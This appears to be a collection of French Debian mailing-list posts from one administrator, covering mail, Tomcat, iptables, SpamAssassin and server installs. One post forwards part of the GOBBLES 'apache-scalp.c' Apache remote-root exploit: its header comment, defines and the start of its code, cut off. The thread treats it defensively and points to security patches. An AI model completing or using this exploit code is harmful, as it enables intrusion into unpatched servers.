Re: apache + php4 + mail()
>> Lorsque j'utilise la fonction mail() et que j'envoie un mail par erreur à
>> une personne qui n'existe pas, le message d'erreur ne m'est pas envoyé, mais
>> est renvoyé à [EMAIL PROTECTED] donc à l'utilisateur apache.
>>
Pour ma part, j'utilise ceci dans Exim3 :
# Rewriting rule for Apache mail (PHP use)
[EMAIL PROTECTED] "${local_part:$header_from:[EMAIL PROTECTED]:$header_from:}"
Fr
Le SENDER reste bien [EMAIL PROTECTED] pour qu'on sache bien que le mail part
du serveur mais les retours vont bien ou il faut.
Si tu as des utilisateurs qui lance des PHP en CRON ou en mode commande, il
faut aussi ajouter une ligne de ce type par utilisateur :
[EMAIL PROTECTED] "${local_part:$header_from:[EMAIL PROTECTED]:$header_from:}"
Fr
Stef...
...
. Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr/ .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
...
Re: TOP et Testing (Sarge)
> * Stephane Leclerc <[EMAIL PROTECTED]> [2003-10-20 22:58] : > > [...] > >> Je me suis peut être mal expliqué. Ce n'est pas les différents threads qui >> me pose problème mais le fait que chaque ligne de processus soient séparée >> par une ligne blanche. Comme si il y avait un retour chariot en trop au >> niveau de l'affichage. Je n'avais pas cela avant. > > Oups, désolé. J'ai cru un peu vite à un problème de formatage des lignes > ... > >> Avant j'avais ceci : >> >> PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND >> 27677 sleclerc 17 0 1108 1108 748 R53.5 0.0 0:02 top >> 22831 www-data 9 0 11888 11M 7980 S 0.9 0.7 0:04 apache >> 16923 www-data 9 0 158M 158M 4320 S 0.4 10.4 0:14 java >> 27620 www-data 9 0 00 0 Z 0.4 0.0 0:00 apache >> 1 root 8 0 472 428 408 S 0.0 0.0 0:45 init >> 2 root 9 0 00 0 SW0.0 0.0 0:00 keventd >> >> Et maintenant ceci : >> >> PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND >> 27677 sleclerc 17 0 1108 1108 748 R53.5 0.0 0:02 top >> >> 22831 www-data 9 0 11888 11M 7980 S 0.9 0.7 0:04 apache >> >> 16923 www-data 9 0 158M 158M 4320 S 0.4 10.4 0:14 java >> >> 27620 www-data 9 0 00 0 Z 0.4 0.0 0:00 apache >> >> 1 root 8 0 472 428 408 S 0.0 0.0 0:45 init >> >> 2 root 9 0 00 0 SW0.0 0.0 0:00 keventd >> >> Ce qui est très chiant car cela provoque un décalage d'affichage au niveau >> de la console en SSH. Le haut de l'affichage Top disparaît à chaque refresh. >> >> Toutes les bécanes que j'ai passé en Sarge ont le même problème. > > Mmm, je n'ai pas trop d'idée, quelle version de procps (3.1.12-1 > normalement dans Sarge), quel noyau, quelle architecture, quel > terminal, quel $TERM, quelle configuration de terminal (stty -a) ? > > > Fred Tout est bon de ce coté là. Le term, le stty, etc. sont identique à ce qu'il y a sur une Woody. procps est la version de Sarge. Et mon logiciel telnet/SSH2 n'a pas changé, même pas en version. Rien trouvé sur Google. Je ne comprend pas vraiment, j'ai plusieurs machines sous Woody qui viennent d'être passé en Sarge et elle ont toutes le même problème. Le dist-upgrade s'étant passé sans problème. Le comportement de l'affichage de TOP est bizarre. A chaque refresh, une ligne de process disparaît (la plus basse). A la fin quand il ne reste plus qu'une ligne, tout disparaît et hop l'ensemble des lignes reviennent au refresh suivant. Et le cycle recommence. Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Re: Top et Testing
> * Stephane Leclerc <[EMAIL PROTECTED]> [2003-10-20 10:53] : >> Bonjour, >> >> Depuis quelques jours, j'ai Top qui affiche des lignes en trop entre chaque >> process sous SARGE. Je ne sais malheureusement pas quand cela à commencé. > > A priori, quand tu as lancé le processus java en question. En fait, top > n'affiche pas des lignes en trop, il affiche simplement une ligne par > thread, cela représente donc plusieurs lignes dans top pour certaines > applications (visiblement java ici, il existe d'autres applications > multi-threadés comme mozilla, xmms, etc). > > > Fred Je me suis peut être mal expliqué. Ce n'est pas les différents threads qui me pose problème mais le fait que chaque ligne de processus soient séparée par une ligne blanche. Comme si il y avait un retour chariot en trop au niveau de l'affichage. Je n'avais pas cela avant. Avant j'avais ceci : PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND 27677 sleclerc 17 0 1108 1108 748 R53.5 0.0 0:02 top 22831 www-data 9 0 11888 11M 7980 S 0.9 0.7 0:04 apache 16923 www-data 9 0 158M 158M 4320 S 0.4 10.4 0:14 java 27620 www-data 9 0 00 0 Z 0.4 0.0 0:00 apache 1 root 8 0 472 428 408 S 0.0 0.0 0:45 init 2 root 9 0 00 0 SW0.0 0.0 0:00 keventd Et maintenant ceci : PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND 27677 sleclerc 17 0 1108 1108 748 R53.5 0.0 0:02 top 22831 www-data 9 0 11888 11M 7980 S 0.9 0.7 0:04 apache 16923 www-data 9 0 158M 158M 4320 S 0.4 10.4 0:14 java 27620 www-data 9 0 00 0 Z 0.4 0.0 0:00 apache 1 root 8 0 472 428 408 S 0.0 0.0 0:45 init 2 root 9 0 00 0 SW0.0 0.0 0:00 keventd Ce qui est très chiant car cela provoque un décalage d'affichage au niveau de la console en SSH. Le haut de l'affichage Top disparaît à chaque refresh. Toutes les bécanes que j'ai passé en Sarge ont le même problème. Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Top et Testing
Bonjour, Depuis quelques jours, j'ai Top qui affiche des lignes en trop entre chaque process sous SARGE. Je ne sais malheureusement pas quand cela à commencé. Quelqu'un aurait-il une idée de la provenance du problème ? Merci Stef... top - 10:49:20 up 10 days, 23:37, 1 user, load average: 2.38, 2.37, 2.26 Tasks: 94 total, 1 running, 93 sleeping, 0 stopped, 0 zombie Cpu(s): 1.1% user, 3.1% system, 0.0% nice, 95.8% idle Mem:385552k total, 336012k used,49540k free, 182416k buffers Swap: 497972k total,10568k used, 487404k free,92268k cached PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 2089 root 18 0 1040 1040 828 R 6.0 0.3 0:00.76 top 727 www-data 9 0 40904 39m 10m S 0.9 10.6 0:02.74 java 729 www-data 9 0 40904 39m 10m S 0.6 10.6 0:02.72 java 735 www-data 9 0 40904 39m 10m S 0.6 10.6 0:02.33 java 726 www-data 9 0 40904 39m 10m S 0.3 10.6 0:01.93 java 1 root 9 0 492 460 436 S 0.0 0.1 0:25.54 init 2 root 9 0 000 S 0.0 0.0 0:00.01 keventd ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Re: fermer tous les ports ouverts sous debian
> Quand je fais nmap l'adresse_IP_de_machine, je vois qu'il y a des ports qui > sont ouverts par exemple: > > ports:- 111 sunrpc, 9 discard > > Comment puis-je enlever ces ports qui on s'en sert pas? Voir dans /etc/indetd.conf Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Tomcat4 & java.lang.StackOverflowError
Bonjour, Quelqu'un aurait-il une idée de recherche ? Sous Woody, j'utilisais Tomcat3 sans problème. J'ai migré sur Tomcat4 et maintenant certains de mes utilisateurs se prennent sans arrêt des java.lang.StackOverflowError. Ils sont en vhost sous Tomcat4. J'utilise : tomcat4 4.0.3-3woody2 libapache-mod-jk 3.3a-4woody1 j2re1.3 1.3.1.02b-2 j2sdk1.3 1.3.1.02b-2 Rien trouvé de bien concluant sous Google. J'avais des paramètres d'optimisation sous CATALINA_OPTS que j'ai viré. Cela ne change rien. Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Re: pb de place /usr
> Je frissone à l'idée de devoir utiliser parted :-( > Une bonne âme pour m'éclairer ? Tu déplaces une partie de /usr et tu fais un ln -s. C'est pas propre mais cela te sauve. Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Re: J2RE-1 4 0
> Je viens de télécharger l'environnement Java pour Linux : J2RE > 1.4.0-linux -i586.bin , mais comment installe t-on la chose sous LINUX > ?? IL s'agit d'un Script shell . Je n'ai rouvé aucune instruction > d'installation après le téléchargement. ET comme je suis un petit > nouveau > Je ne sais pas trop comment m'y prendre. QQ aurait-il installé cela sur > sa machine ?? Des paquets Debian Blackdown existe en 1.4 sur différent miroir. http://www.blackdown.org/ Attention, le miroir Oleane contient des paquets vérolés (bas checksum). # JAVA 2 #deb ftp://ftp.oleane.net/pub/java-linux/debian unstable main non-free deb ftp://ftp.easynet.be/blackdown/debian unstable main non-free Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
JAVA RESIN
Bonjour, Quelqu'un saurait-il si des .DEB du logiciel RESIN existe pour Woody ? Stef... ... . Linux - Debian - php4 - JAVA/Tomcat - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr/ . . Tel: (0)141 906 100-Fax: (0)141 906 101. ...
Les Woodistes ont leur script !
Un lien sympa sur debian.org pour ceux qui veulent passer en douceur de Potato à Woody. http://www.debian.org/doc/manuals/quick-reference/examples/go-woody Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: à l'attention du Bureau d'études automatismes - Proposition d'envoi d'un nouveau catalogue de composants
> A l'attention du Responsable du Bureau d'études automatismes - Merci de bien > vouloir apporter votre > attention à ce message. Beau fichier que le leur. Bien ciblé !!! Je l'ai reçu aussi sur presque tous les e-mails "publics" que j'administre. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [phpmyadmin] droits d'un utilisateur mysql
> je cherche a configurer mysql a l'aide de phpmyadmin > > je voudrais créer un utilisateur qui a une base par défaut et qui a tous > les droits dessus, mais qui a aussi le droit de créer de nouvelles bases > sur lesquelles il aura tous les droits > > il ne doit pas cependant avoir acces aux autres bases - créer un utilisateur mon_user dans la table user avec N partout - créer un enregistrement dans la table db avec mon_user, sa_base, mettre Y partout Si mon_user a plusieurs bases, créer autant d'enregistrement dans db qu'il y a de base. Il ne pourra pas voir et toucher les autres bases. Par contre, je crois que pour donner le droits de créer une base, tu es cuit. Si tu lui donnes, du coup, il verra les autres bases et il aura des droits sur ces bases. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [+-OT] Retours d'expériences sur phpGroupWare
> > mais plus précisèment, je cherche à trouver quelqu'un pour qui > l'application phpgroupware est _opérationnelle_ à partir d'une Debian > évidemment (et pour le moment le silence sur ce point me laisse > dubitatif ...) Je l'ai installé pour un client. Le truc fonctionne techniquement mais la traduction française est horrible. Les modules sont de qualité très variable. Les utilisateurs ne s'en servent pas car ils n'y comprennent rien. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Exploit root Apache [was Re: [OT] Le journal du Net s'attaque au logiciel libre]
>> wget http://incoming.debian.org/apache-common_1.3.26-1_i386.deb >> wget http://incoming.debian.org/apache_1.3.26-1_i386.deb > > Ils n'y sont plus, je les ai dans unstable mais il y a un bug sur la > la version du module perl: Passe par dpkg. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Exploit root Apache [was Re: [OT] Le journal du Net s'attaque au logiciel libre]
> Stephane Leclerc a écrit : >> >> Viens d'arriver dans mon mail ! >> >> Un nouvel exploit root d'Apache. Une suite à l'histoire d'ISS. >> >> Que fait Debian sur ceci. Je n'ai pas l'info. >> > J'ai testé sur mon serveur local, rien de spécial ne se passe, en regardant > de plus près dans le /var/log/apache/error.log on voit que tous les > processus fils ont 'segfaultés', donc pas de pb. > > Le code que tu as join permet d'exploiter la faille sous OpenBDS si je me > souviens bien. > > Une correction est proposée sur security.debian.org pour stable, le patch > pour (soon to be released) woody n'est pas encore dispo, cf: > http://www.debian.org/security/2002/dsa-132 > http://www.debian.org/security/2002/dsa-131 Merci J'ai trouvé les paquets "woody" dans incoming : wget http://incoming.debian.org/apache-common_1.3.26-1_i386.deb wget http://incoming.debian.org/apache_1.3.26-1_i386.deb Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [+-OT] Retours d'expériences sur phpGroupWare
>> Certain ici avait testé les paquets Debian de phpGroupWare, j'aurais >> voulu avoir des retours d'expérience sur ce produit. Notamment sur >> la capacité à tenir la charge avec environ 200 personnes, et les >> fonctionnalités de l'agenda partagé. C'est pour remplacer un truc du >> style Exange. > > Avant d'en arriver là, j'aimerai également savoir sur quel "système" > l'installation est opérationnelle (liste des paquets Debian et leur > version ) # phpGroupeWare deb http://deb.phpgroupware.org test main deb-src http://deb.phpgroupware.org test main .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Exploit root Apache [was Re: [OT] Le journal du Net s'attaque au logiciel libre]
Viens d'arriver dans mon mail !
Un nouvel exploit root d'Apache. Une suite à l'histoire d'ISS.
Que fait Debian sur ceci. Je n'ai pas l'info.
Stef...
/*
* apache-scalp.c
* OPENBSD/X86 APACHE REMOTE EXPLOIT!!!
*
* ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
*
* BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
*
* ". . . and Doug Sniff said it was a hole in Epic."
*
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
*
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, [EMAIL PROTECTED], ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by
a slew
* of researchers.
*
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
*
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
*
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
*
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes
the
* exploitation possible.
*
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
*
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
*
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
*
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
*
* Testbeds: synnergy.net, monkey.org, 9mm.com
*
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
*
* [#!GOBBLES QUOTES]
*
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* --- ANOTHER BUG BITE THE DUST... VRM VRRROM
*
* this thing is a major exploit. do you really wanna publish it?
* i'm not afraid of whitehats
* the blackhats will kill you for posting that exploit
* blackhats are a myth
* so i'm not worried
* i've never seen one
* i guess it's sort of like having god in your life
* i don't believe there's a god
* but if i sat down and met him
* i wouldn't walk away thinking
* "that was one hell of a special effect"
* so i suppose there very well could be a blackhat somewhere
* but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
*
* [GOBBLES POSERS/WANNABES]
*
* --- [EMAIL PROTECTED] (none of us join here, but we've sniffed it)
* --- [EMAIL PROTECTED] (low-level.net)
*
* GOBBLES Security
* [EMAIL PROTECTED]
* http://www.bugtraq.org
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed
*/
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146
[ ]
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
[ ]
};
int main(int argc, char *argv[]) {
char *hostp, *portp;
unsigned char buf[512], *expbuf, *p;
in
Attention : maj unstable de cette nuit
Attention ! Je sais pas encore si cela à avoir mais mon petit serveur sur lequel je test SID est cassé depuis ce matin après la mise à jour APT de cette nuit. Je fais un reboot pour une autre raison et au démarrage voici le message. Inconsistency detected by ld.so: dynamic-link.h: 62: elf_get_dynamic_info: Assertion '! "bad dynamic tag"' failed! + possible de ce loguer. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: RAID
> J'ai bien pris 2 disques mais je veux simplement valider le RAID sur une > partition quelconque ET sur un disque sur un autre. Je voudrais juste te dire 2 choses à propos du RAID soft : - sa bouffe une grande partie la puissance de la machine - les accès disque sont super lent et le load énorme - c'est pas très fiable J'ai installé 2 fois une machine comme cela en RAID 1 avec 2 disques IDE et chaque fois au bout de 2/3 mois, boom. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: MacSSH et make menuconfig
>> A vue de nez, c'est quand même plutot au niveau des polices de >> caractères qu'il faut chercher. > > Bah tous les caractères de cadre ne sont pas dans iso-latin... Je crois que c'est cela. Que je prenne iso, vt100, et d'autres polices sur mesure pour le Mac, les caractères "normaux" passe très bien, y compris les accents, par contre les caractères semi-graphiques du cadre menuconfig, non. Stef... Ps : je sais c'est hors sujet mais c'est sur un serveur debian que je me connecte... Et je me vois mal poser ce genre de question sur un forum mac. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
MacSSH et make menuconfig
Bonjour, C'est pour ceux qui sont sur Mac... J'ai switché de Better Telnet à MacSSH en raison de SSHv2. Tout va bien sauf dans le menu de configuration de menuconfig du kernel. Le cadre de la fenêtre s'affiche avec des "ÚÄÄÄ" au lieu des _ et autre |. Quelqu'un a-t-il trouvé la solution ? (pas trouvé sur Google) Merci Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Iptables FTP
> J'ai un serveur FTP derrière un firewall (sous iptables noyau 2.4.18) > > Donc j'autorise une machine de mon lan a ce connecte au serveur ftp > > iptables -A INPUT -i eth0 -s 192.168.0.7 -m state --state NEW,ESTABLISHED -p > tcp --dport 21 -j ACCEPT > iptables -A OUTPUT -o eth0 -d 192.168.0.7 -m state --state ESTABLISHED -p tcp > --sport 21 -j ACCEPT Peux-être une histoire avec le "passive mode". Bout de routine que j'utilise chez moi : # Passive ftp # Nécessite ip_conntrack_ftp iptables -A ext-lo -p tcp --sport 1024:65535 --dport 1024:65535 \ -m state --state ESTABLISHED -j ACCEPT iptables -A ext-lo -p tcp --sport 1024:65535 --dport 1024:65535 \ -m state --state ESTABLISHED,RELATED -j ACCEPT .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spamassassin, exim et fetchmail
>
>> Create a basic setup for GLOBAL user in the userpref table.
>
> que veux-tu dire par la ?
Pour que le système marche, il faut au moins un enregistrement dans la base
de données. L'enregistrement GLOBAL.
INSERT INTO userpref VALUES ('GLOBAL', 'rewrite_subject', '0', 303);
INSERT INTO userpref VALUES ('GLOBAL', 'report_header', '0', 304);
INSERT INTO userpref VALUES ('GLOBAL', 'defang_mime', '1', 305);
INSERT INTO userpref VALUES ('GLOBAL', 'use_terse_report', '0', 306);
INSERT INTO userpref VALUES ('GLOBAL', 'required_hits', '7', 307);
INSERT INTO userpref VALUES ('GLOBAL', 'whitelist_from',
'[EMAIL PROTECTED]', 6);
INSERT INTO userpref VALUES ('GLOBAL', 'blacklist_from',
'[EMAIL PROTECTED]', 11);
required_hits = 7 est la meilleure valeur.
Stef...
..
. Linux - Debian - php4 - Apache - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
..
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spamassassin, exim et fetchmail
> j'aimerais mettre en place une solution pour éliminer la majeure partie
> de ce spam
Si cela peut t'aider, j'ai écrit cette doc d'intégration d'Exim et de
SPAMASSASSIN il y quelques temps.
Stef...
..
. Linux - Debian - php4 - Apache - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
..
README.exim
Description: application/applefile
Set up spamassassin + mysql + exim on Debian (full exim-filter solution).
Setup by [EMAIL PROTECTED]
March 16, 2002.
--
Applications needed: exim 3.3x, spamassassin 2.x and razor 1.19x.
Create a MySQL database according to the README.sql manual in
/usr/share/doc/spamassassin.
Create a basic setup for GLOBAL user in the userpref table.
You can use the PHP php-sa-mysql-0.5.tar.gz sample found at
http://spamassassin.taint.org/devel/.
1) Edit /etc/default/spamassassin (-D can be removed in production mode)
ENABLED=1
OPTIONS="-u mail -D -x -q"
2) Edit /etc/spamassassin/local.cf and insert SQL code
user_scores_dsn DBI:mysql:spam:localhost
user_scores_sql_usernamespam
user_scores_sql_passwordpassword
Mail are filtered according to the GLOBAL user preferences in the SQL database.
3) Start spamd: /etc/init.d/spamassassin start
4) Create the /etc/exim/spam-messages (here is mine as an example)
Your mail with Subject:
$h_Subject:
to the user $header_To: appears to be unsolicited spam.
If you intended to contact a person at that email for legitimate reasons
then our apologies. Please call your technical support to solve this issue.
Thank you
[EMAIL PROTECTED]
5) Edit /etc/exim/exim.conf with the following fragments
# General config for Spam Assassin
message_filter = /etc/exim/spam-filter
message_filter_reply_transport = spam_reply_transport
# End of General config
# Spam Assassin transport
spam_reply_transport:
driver = autoreply
user = mail
# This transport does a spam check to look for spam and then re-injects
# the message into Exim
check_spam:
driver = pipe
user = mail
group = mail
prefix =
suffix =
# If you have problems, all is here.
command = spamc | exim -oMr spam_checked ${if eq {$sender_address} {} \
{} {-f $sender_address}} ${pipe_addresses}
#
ignore_status = true
use_shell = true
return_output = false
return_path_add = false
path = "/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
# End of Spam Assassin transport
# Spam Assassin Director
# place at the start of the Directors section
spam_to_check:
condition = ${if eq {$received_protocol} {spam_checked} {0} {0} }
driver = smartuser
transport = check_spam
# End of Spam Assassin director
# Spam Assassin Router
# place this section only if your Exim server is a SMTP gateway
# passing messages to a smarthost
# place at the start of the Routers section
spam_router:
condition = "${if eq {$received_protocol}{spam_checked} {0}{1}}"
driver = domainlist
route_list = "*"
transport = check_spam
# End of Spam Assassin router
6) Create a file /etc/exim/spam-filter
# Exim Spam Filter for Spam Assassin
if first_delivery and
$h_X-Spam-Flag: contains "YES"
then
logfile /var/log/exim/spamlog.log
logwrite "$tod_log From: $h_From: Subject: $h_Subject: Sender:
$sender_address"
if $h_From: is not ""
then
mail to $h_From: subject "Re: Your message has been rejected!"
expand file /etc/exim/spam-messages
once /var/log/exim/spamcount.log
once_repeat 5d
endif
seen finish
endif
# End of Exim Spam Filter
7) Restart exim: /etc/init.d/exim restart
That's all!
--
Re: Dell 2650 et Debian
> Je n'arrive pas à trouver le raid, je n'ai accès qu'à l'autr controller > aic7899 qui gère mon disque normal. > > Je crois que c'est un PERC3/DC Je ne veux pas être méchant mais quand on achète un PowerEdge 6400, vu le prix de la bestiole, on sais ce qu'il y a dedans... Donc regarde ton Bon de Livraison, puis ouvre la machine et regarde dedans, et ensuite test la machine avec DellOpenManage pour vérifier les composants de celle-ci. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Dell 2650 et Debian
> Bon, je viens d'essaye d'installer une potato 2.2r5 sur un Dell > PowerEdge 6400 et j'ai de problèmes d'inodes > donc quel noyau dois-je utiliser??? donc quelle boot-floppies?? Utilise bf2.4 en disquette ou le CD N° 5 de Woody. Quand tu aurras réussit à booter sur le disque, fait un lspci, imprime la liste et recompile un noyau 2.4.18 avec les bonnes options pour ton hardware. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Dell 2650 et Debian
>> Stephane Leclerc wrote: >>>> Une page très fournie sur Dell et Linux : http://domsch.com/linux/ >>>> >>> Le problème est spécifique au 2650. J'ai tout un tas d'autres >>> modèles qui >>> eux fonctionnent parfaitement. > > les 1650 aussi ? je crois qu'il faut obligatoirement un 2.4.18 pour > booter avec la nouvelle carte PERC ... Un peu plus compliqué hélas ! après 2 jours de test. Le 2650 est une nouvelle bécane avec de nouveaux chipset (Serverworks LEGe et OSB4/CSB5), des slots PCI-X, la dernière version de la carte MegaRAID en PCI-X et une carte Ethernet BMC5700 (plus d'ee100). Résultat, il faut se fabriquer un kernel 2.4.18 custom avec des patches pour toutes ces nouvelles électroniques. Ensuite il faut se faire une disquette de boot à partir du squelette bf2.4. Après l'install de l'OS de base, il faut installer le driver de la carte Ethernet (dispo uniquement en module !). Après, on a normalement l'accès au net. Ah oui, il faut aussi supprimer le driver sym53c416. Sinon boom. Marche pas du tout en 2.2.20, même patché. Le problème est qu'il faut utiliser pas mal de codes "EXPERIMENTAL". Donc aucune idée pour l'instant de la stabilité de cette machine en production. 